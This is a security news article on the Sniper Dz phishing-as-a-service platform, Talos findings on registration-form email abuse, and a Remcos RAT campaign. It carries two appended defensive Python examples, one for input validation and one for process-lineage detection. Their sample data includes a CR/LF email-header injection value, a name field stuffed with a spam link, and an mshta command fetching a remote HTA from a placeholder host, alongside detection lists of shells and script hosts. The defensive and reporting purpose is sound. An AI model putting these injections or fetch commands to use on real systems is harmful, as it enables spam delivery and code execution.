Free Sniper Dz Phishing Tools Fuel 140,000+ Cyber Attacks Targeting User Credentials
More than 140,000 phishing websites have been found linked to a phishing-as-a-service (PhaaS) platform named Sniper Dz over the past year, indicating that it’s being used by a large number of cybercriminals to conduct credential theft.
“For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages,” Palo Alto Networks Unit 42 researchers Shehroze Farooqi, Howard Tong, and Alex Starov said in a technical report.
“Phishers can either host these phishing pages on Sniper Dz-owned infrastructure or download Sniper Dz phishing templates to host on their own servers.”
Perhaps what makes it even more appealing is that these services are provided for free. The catch is that the credentials harvested using the phishing sites are also exfiltrated to the operators of the PhaaS platform, a technique that Microsoft calls double theft.
PhaaS platforms have become an increasingly common way for aspiring threat actors to enter the world of cybercrime, allowing even those with little technical expertise to mount phishing attacks at scale.
Such phishing kits can be purchased on Telegram, with dedicated channels and groups catering to every aspect of the attack chain, from hosting services to sending phishing messages.
Sniper Dz is no exception in that the threat actors operate a Telegram channel with over 7,170 subscribers as of October 1, 2024. The channel was created on May 25, 2020.
Interestingly, a day after the Unit 42 report went live, the people behind the channel enabled the auto-delete option, which automatically clears all posts after one month. This likely suggests an attempt to cover up traces of their activity, although earlier messages remain intact in the chat history.
The PhaaS platform is accessible on the clearnet and requires signing up for an account to “get your scams and hack tools,” according to the website’s home page.
A video uploaded to Vimeo in January 2021 shows that the service offers ready-to-use scam templates for various online sites like X, Facebook, Instagram, Skype, Yahoo, Netflix, Steam, Snapchat, and PayPal in English, Arabic, and French languages. The video has more than 67,000 views to date.
The Hacker News has also identified tutorial videos uploaded to YouTube that take viewers through the different steps required to download templates from Sniper Dz and set up fake landing pages for PUBG and Free Fire on legitimate platforms like Google Blogger.
However, it’s not clear if they have any connection to the developers of Sniper Dz, or if they are just customers of the service.
Sniper Dz comes with the ability to host phishing pages on its own infrastructure and provide bespoke links pointing to those pages. These sites are then hidden behind a legitimate proxy server (proxymesh[.]com) to prevent detection.
“The group behind Sniper Dz configures this proxy server to automatically load phishing content from its own server without direct communications,” the researchers said.
“This technique can help Sniper Dz to protect its backend servers, since the victim’s browser or a security crawler will see the proxy server as being responsible for loading the phishing payload.”
The other option for cybercriminals is to download phishing page templates offline as HTML files and host them on their own servers. Furthermore, Sniper Dz offers additional tools to convert phishing templates to the Blogger format that could then be hosted on Blogspot domains.
The stolen credentials are ultimately displayed on an admin panel that can be accessed by logging into the clearnet site. Unit 42 said it observed a surge in phishing activity using Sniper Dz, primarily targeting web users in the U.S., starting in July 2024.
“Sniper Dz phishing pages exfiltrate victim credentials and track them through a centralized infrastructure,” the researchers said. “This could be helping Sniper Dz collect victim credentials stolen by phishers who use their PhaaS platform.”
The development comes as Cisco Talos revealed that attackers are abusing web pages connected to backend SMTP infrastructure, such as account creation form pages and others that trigger an email back to the user, to bypass spam filters and distribute phishing emails.
These attacks take advantage of poor input validation and sanitization prevalent on these web forms to include malicious links and text. Other campaigns conduct credential stuffing attacks against mail servers of legitimate organizations so as to gain access to email accounts and send spam.
“Many websites allow users to sign up for an account and log in to access specific features or content,” Talos researcher Jaeson Schultz said. “Typically, upon successful user registration, an email is triggered back to the user to confirm the account.”
“In this case, the spammers have overloaded the name field with text and a link, which is unfortunately not validated or sanitized in any way. The resulting email back to the victim contains the spammer’s link.”
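The abuse Talos describes hinges on a registration form interpolating the name field straight into the confirmation email. The following added example (not code from Talos or from any affected site) shows that unsafe pattern beside a hardened version that rejects URLs, CR/LF header-injection attempts and over-long values, and HTML-escapes the name before it reaches the email body; the sample inputs are constructed.

```python
import re
from html import escape
from typing import Optional

# Constructed sample values a registration form might receive in its "name" field.
# The second mimics the abuse Talos describes (text plus a link stuffed into the
# name), the third is a CR/LF header-injection attempt.
SAMPLE_NAMES = [
    "Alice Example",
    "Your parcel is waiting! Claim at http://example.invalid/claim now",
    "Bob\r\nBcc: victim@example.invalid",
]

# Anything that looks like a link: scheme, www., or bare host.tld
URL_RE = re.compile(r"(?i)\b(?:https?://|www\.)\S+|\b[\w-]+\.(?:com|net|org|ru|xyz|info)\b")
# A display name: starts with a letter, then letters, digits, apostrophe, hyphen, dot, space
NAME_RE = re.compile(r"^[^\W\d_][\w'\-. ]{0,63}$", re.UNICODE)

def validate_name(raw: str) -> Optional[str]:
    """Return a cleaned display name, or None if the value must be rejected."""
    value = raw.strip()
    # CR/LF must never reach an email header, or new headers can be injected
    if "\r" in value or "\n" in value:
        return None
    if len(value) > 64 or URL_RE.search(value):
        return None
    if not NAME_RE.fullmatch(value):
        return None
    return value

def unsafe_confirmation(raw_name: str) -> str:
    # The "before" behaviour: the submitted name is interpolated with no checks,
    # so whatever the spammer typed, link included, is mailed to the victim.
    return f"<p>Hi {raw_name}, please confirm your account.</p>"

def build_confirmation(raw_name: str) -> Optional[str]:
    """Hardened version: validate first, then HTML-escape before templating."""
    name = validate_name(raw_name)
    if name is None:
        return None  # caller returns a form error instead of sending mail
    return f"<p>Hi {escape(name)}, please confirm your account.</p>"
```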
It also follows the discovery of a new email phishing campaign that leverages a seemingly harmless Microsoft Excel document to propagate a fileless variant of Remcos RAT by exploiting a known security flaw (CVE-2017-0199).
“Upon opening the [Excel] file, OLE objects are used to trigger the download and execution of a malicious HTA application,” Trellix researcher Trishaan Kalra said. “This HTA application subsequently launches a chain of PowerShell commands that culminate in the injection of a fileless Remcos RAT into a legitimate Windows process.”
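The chain Trellix describes (Excel, then an HTA launched via mshta, then PowerShell) is visible in process-creation telemetry as a parent/child lineage. The following added example, which is not from Trellix or the original article, walks that lineage over constructed process events and flags any shell whose ancestry passes through an Office application; it generalises slightly by also flagging Office spawning a shell directly, a pattern the page does not mention.

```python
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable basename as logged
    cmdline: str

# Constructed sample telemetry (not real logs): Excel spawns mshta, which spawns
# PowerShell; a separate PowerShell started from Explorer is benign noise.
EVENTS = [
    ProcEvent(100, 1,   "explorer.exe",   "explorer.exe"),
    ProcEvent(200, 100, "EXCEL.EXE",      '"EXCEL.EXE" C:\\Users\\u\\invoice.xlsx'),
    ProcEvent(300, 200, "mshta.exe",      "mshta.exe http://example.invalid/x.hta"),
    ProcEvent(400, 300, "powershell.exe", "powershell.exe -nop -w hidden -c <omitted>"),
    ProcEvent(500, 100, "powershell.exe", "powershell.exe"),
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Lower-cased image names from the given process up to the root, child first."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    chain: List[str] = []
    while pid in by_pid:
        e = by_pid[pid]
        chain.append(e.image.lower())
        pid = e.ppid
    return chain

def suspicious_chains(events: List[ProcEvent]) -> List[int]:
    """PIDs of shells with an Office ancestor (directly or via a script host)."""
    hits: List[int] = []
    for e in events:
        if e.image.lower() not in SHELLS:
            continue
        chain = ancestry(events, e.pid)
        if any(img in OFFICE for img in chain[1:]):
            hits.append(e.pid)
    return hits
```

In a real deployment the same logic runs over Sysmon Event ID 1 or equivalent EDR process-creation events keyed by process GUID rather than PID, since PIDs are reused.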